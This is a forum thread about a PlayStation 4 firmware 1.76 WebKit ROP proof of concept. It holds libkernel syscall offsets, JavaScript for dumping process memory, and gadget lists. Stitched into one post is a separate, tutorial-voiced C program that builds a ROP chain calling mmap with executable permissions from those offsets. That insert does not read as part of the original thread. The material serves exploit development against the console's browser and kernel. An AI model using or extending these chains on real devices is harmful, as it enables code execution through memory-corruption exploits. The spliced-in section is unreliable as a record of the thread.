
PS4 1.76 Webkit ROP POC

Underground PS4 discussions
varinek
Posts: 4
Joined: Mon Oct 08, 2012 5:58 am

Re: PS4 1.76 Webkit ROP POC

Post by varinek » Wed Oct 29, 2014 8:09 pm

Interesting, it's working for you :D

Takezo
Posts: 14
Joined: Mon Oct 20, 2014 7:05 am

Re: PS4 1.76 Webkit ROP POC

Post by Takezo » Thu Oct 30, 2014 10:22 am

@Nas, could you add comments after your gadgets please (pop ...)?
Which calling convention did you use?
Because it seems that x86_64 uses registers for arguments...

esperas
Posts: 3
Joined: Thu Oct 30, 2014 5:28 pm

Re: PS4 1.76 Webkit ROP POC

Post by esperas » Thu Oct 30, 2014 5:43 pm

Hi everyone. Actually I'm just new to this kind of exploit or hack for the PS4, and I never had any experience with PS3 hacking or jailbreaking because I don't own a PS3, but I got interested in the PS4, so I just thought maybe someday in the future it will be hacked and, as a PlayStation fan, I just want to ask, sir, if someone could share with me please.... What is the purpose of this WebKit dump for the PS4? And what will happen? Is it safe? Because I just don't want to lose my PS4, it's hard to buy... but I just want to try it... and maybe I'll get to relate to the topic and share my experience. Thank you guys...

esperas
Posts: 3
Joined: Thu Oct 30, 2014 5:28 pm

Re: PS4 1.76 Webkit ROP POC

Post by esperas » Thu Oct 30, 2014 5:46 pm

My PS4 is on v1.76. I will not update until there's a new exploit for 2.00. Please help me, guys....

unknown v2
Posts: 2
Joined: Thu Oct 30, 2014 9:48 pm

Re: PS4 1.76 Webkit ROP POC

Post by unknown v2 » Fri Oct 31, 2014 1:39 am

Takezo wrote: @Nas I found some useful syscalls in libkernel

sys_exit = 0xDD50 # + libkernel_base
munmap = 0xC0B0 # + libkernel_base
execve = 0xBFF0 # + libkernel_base

How did you find those syscall addresses? Did you dump "libkernel" using this method?

Takezo
Posts: 14
Joined: Mon Oct 20, 2014 7:05 am

Re: PS4 1.76 Webkit ROP POC

Post by Takezo » Fri Oct 31, 2014 7:44 am

Yes, I found them with IDA Pro in my libkernel dump.

Code:

ioctl = 0xBF70
getlogin = 0xBF10 
fstat = 0xBDD0
fork = 0xB9D0
write = 0xBA10
open = 0xBA30
close = 0xBA50
wait4 = 0xBA70
chroot = 0xC030
mmap = 0xC090
mprotect = 0xC0D0
...

Code:

I replaced <body> in ps4.php with
<body onload="btnClick()"> (dump on load)

Code:

ps4_rop2.html

makeDumpLink(libkernel_base, chunk, 3, "libkernel_base"); // dump libkernel
makeDumpLink(wk_base+0xB39D7, chunk, 341, "wk_base_offB39D7"); // dump WebKit at offset 0xB39D7 (result = dump.bin, 37.2 MB)

// Emit a link to ps4.php that dumps nbSeg chunks of sizeDump bytes starting at offset
function makeDumpLink(offset, sizeDump, nbSeg, nameModule)
{
logAdd("<h2><a href='ps4.php?base=0x" + offset.toString(16) + "&chunk=0x" + sizeDump.toString(16) + "&cnt=0x" + nbSeg.toString(16) + "'>"+nameModule+" "+nbSeg.toString(10) + "</a></h2>");
}

Code:

nas's gadget_arg:
#pop rdi ; ret
#pop rsi ; ret
#call why ???
#pop rcx ; ret
#pop r8  ; ret
#pop r9  ; ret

abcdf
Posts: 2
Joined: Fri Oct 31, 2014 3:26 pm

Re: PS4 1.76 Webkit ROP POC

Post by abcdf » Fri Oct 31, 2014 3:29 pm

Debug settings in a retail PS4 by SKFU, but we can't use it :(

Image

anhell28
Posts: 33
Joined: Mon Apr 16, 2012 2:07 am

Re: PS4 1.76 Webkit ROP POC

Post by anhell28 » Fri Oct 31, 2014 3:47 pm

Things are getting very interesting for the PS4.

yifanlu
Guru
Posts: 760
Joined: Sun Mar 11, 2012 6:42 am
Contact:

Re: PS4 1.76 Webkit ROP POC

Post by yifanlu » Fri Oct 31, 2014 7:12 pm

abcdf wrote:debug settings in retail ps4 by skfu, but we cant use it :(
An empty screen. Impressive.

nas
Posts: 10
Joined: Thu Aug 14, 2014 6:35 am

Re: PS4 1.76 Webkit ROP POC

Post by nas » Sat Nov 01, 2014 11:27 am

Takezo wrote: @Nas, could you add comments after your gadgets please (pop ...)?
Which calling convention did you use?
Because it seems that x86_64 uses registers for arguments...

The calling convention is the "System V AMD64 ABI" (see http://en.wikipedia.org/wiki/X86_callin ... onventions).
"pop r** ; ret" for arguments 1-6, the stack for 7 and on.
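The convention nas describes above, as an added example that is not code from this thread or from the PS4 exploit: a small C chain builder that lays out a function call the way a System V AMD64 ROP chain must. Arguments 1-6 are loaded with "pop reg ; ret" gadgets; arguments 7 and up, which the thread only mentions in passing, have to sit on the stack above the word the callee will treat as its return address, and that word must be a stack-adjusting gadget so the chain resumes past them. The gadget addresses, the libkernel_base value and the FreeBSD mmap flag values are assumptions made for the example; only the mmap offset 0xC090 is taken from Takezo's list.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Hypothetical gadget addresses (assumed for this example, not taken from the
 * thread's libkernel or WebKit dumps). In a real chain each is module base +
 * an offset located in the dump. */
#define G_POP_RDI_RET    0x1000ULL /* pop rdi ; ret */
#define G_POP_RSI_RET    0x1010ULL /* pop rsi ; ret */
#define G_POP_RDX_RET    0x1020ULL /* pop rdx ; ret */
#define G_POP_RCX_RET    0x1030ULL /* pop rcx ; ret */
#define G_POP_R8_RET     0x1040ULL /* pop r8  ; ret */
#define G_POP_R9_RET     0x1050ULL /* pop r9  ; ret */
#define G_ADD_RSP_16_RET 0x1060ULL /* add rsp, 0x10 ; ret  (discards 2 stack words) */

#define MAX_CHAIN 64

typedef struct {
    uint64_t words[MAX_CHAIN]; /* chain as it would be written over the stack */
    size_t   len;
} rop_chain;

static int push_word(rop_chain *c, uint64_t w) {
    if (c->len >= MAX_CHAIN) return -1;
    c->words[c->len++] = w;
    return 0;
}

/* Append a call to `func` with `nargs` arguments under the System V AMD64 ABI.
 * Arguments 1-6 go in rdi, rsi, rdx, rcx, r8, r9 via "pop reg ; ret" gadgets.
 * When the chain `ret`s into `func`, rsp points at the word after `func`; the
 * callee treats that word as its return address and [rsp+8], [rsp+16], ... as
 * arguments 7, 8, ... So for stack arguments the layout is
 *     ..., func, G_ADD_RSP_16_RET, arg7, arg8
 * and the add rsp,0x10 gadget that func returns into steps over the two stack
 * slots so the next chain entry executes. Returns 0 on success, -1 if the
 * chain would overflow or more than 2 stack arguments are requested (the only
 * skip gadget modelled here is add rsp,0x10). */
static int rop_call(rop_chain *c, uint64_t func, const uint64_t *args, size_t nargs) {
    static const uint64_t reg_gadgets[6] = {
        G_POP_RDI_RET, G_POP_RSI_RET, G_POP_RDX_RET,
        G_POP_RCX_RET, G_POP_R8_RET,  G_POP_R9_RET,
    };
    size_t nreg   = nargs < 6 ? nargs : 6;
    size_t nstack = nargs - nreg;

    if (nstack > 2) return -1;

    for (size_t i = 0; i < nreg; i++) {
        if (push_word(c, reg_gadgets[i]) || push_word(c, args[i])) return -1;
    }
    if (push_word(c, func)) return -1;
    if (nstack == 0) return 0; /* next chain word is simply func's return address */

    /* func's "return address": gadget that discards the stack args, then rets */
    if (push_word(c, G_ADD_RSP_16_RET)) return -1;
    for (size_t i = 0; i < nstack; i++) {
        if (push_word(c, args[6 + i])) return -1;
    }
    /* pad to two slots so add rsp,0x10 lands exactly on the next gadget */
    for (size_t i = nstack; i < 2; i++) {
        if (push_word(c, 0)) return -1;
    }
    return 0;
}

/* Chain for mmap(NULL, 0x4000, PROT_READ|PROT_WRITE|PROT_EXEC,
 * MAP_PRIVATE|MAP_ANON, -1, 0) through libkernel's mmap stub. The 0xC090
 * offset is from Takezo's list; libkernel_base is whatever the caller leaked.
 * Flag values are the FreeBSD ones (assumed: PROT_* = 1|2|4, MAP_PRIVATE =
 * 0x2, MAP_ANON = 0x1000). All six arguments fit in registers. */
static int build_mmap_chain(rop_chain *c, uint64_t libkernel_base) {
    const uint64_t args[6] = { 0, 0x4000, 7, 0x1002, (uint64_t)-1, 0 };
    c->len = 0;
    return rop_call(c, libkernel_base + 0xC090, args, 6);
}

int main(void) {
    rop_chain c;
    if (build_mmap_chain(&c, 0x800000000ULL) != 0) return 1;
    for (size_t i = 0; i < c.len; i++)
        printf("[%2zu] 0x%016llx\n", i, (unsigned long long)c.words[i]);
    return 0;
}
```

The pop-gadget order does not matter for correctness, but the stack-argument tail does: if the word after `func` is an ordinary gadget rather than one that adjusts rsp, the callee reads the next chain entries as its 7th and 8th arguments and, on return, the chain executes those argument values as addresses.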
